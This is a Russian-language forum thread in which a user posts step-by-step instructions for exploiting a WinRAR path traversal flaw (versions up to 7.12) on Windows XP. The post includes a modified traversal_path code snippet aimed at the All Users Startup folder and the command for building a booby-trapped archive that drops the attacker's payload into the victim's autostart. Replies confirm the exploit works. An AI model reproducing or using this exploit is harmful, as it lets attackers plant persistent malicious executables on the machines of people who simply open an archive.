Less bytes, more meaning...
Not authorized

Registration date is not available.
Login | Register | Users


Downgrade > Forums > Programms > Критическая уязвимость WinRar (5.0+)


<< < Page 1 of 1 > >>

doormimiz

Member since Feb 25, 2026
Привет Акопяны! Хочу показать, как эксплуатировать опасную уязвимость в Winrar версии 5.0 и выше, то есть под XP как минимум

Для начала, скачайте весь репозиторий отсюда и в файле main.py отыщите функцию build_startup_traversal_path, после чего замените в ней переменную traversal_path на это:

traversal_path = (
"..\\..\\..\\..\\..\\..\\..\\..\\..\\&qu­o­t­;­
+ "DOCUME~1\\All Users\\STARTM~1\\Programs\\Startup\\"
+ payload_name
)


(или вы можете скачать уже заранее заготовленный вариант отсюда)

Все эти изменения нужны чтобы подготовить программу под реалии Windows XP.

Далее о том как это юзать:

python main.py --decoy <ФАЙЛ КОТОРЫЙ БУДЕТ В АРХИВЕ> --payload <ФАЙЛ КОТОРЫЙ БУДЕТ ПОМЕЩЕН В СТАРТАП ЖЕРТВЫ (ЖЕЛАТЕЛЬНО ИСПОЛНЯЕМЫЙ, НАПР. BAT)>

По итогу у вас в папке появляется зараженный архивчик, если даже просто открыть его (не распаковывать) Winrar версии до 7.12, то исполняемый файл будет помещен в автозапуск

Проверял лично под Winrar 6 и XP SP3
Posted Apr 24, 2026, 02:18 PM Quote
j2a

Member since Jan 18, 2026
Очень неплохо, уязвимость рабочая
Posted Apr 24, 2026, 08:21 PM Quote
cloudpeople

Member since Apr 24, 2026
Это получается все UNRAR.Dll до 7.12-ой уязвимы?
Posted Apr 24, 2026, 08:38 PM Quote


Copyright (c) 2026, Downgrade.
Please ask questions and report any problems on our forum.
Downgrade Net Button

Visitor Counter
0000355
Here is a list of Downgrade users.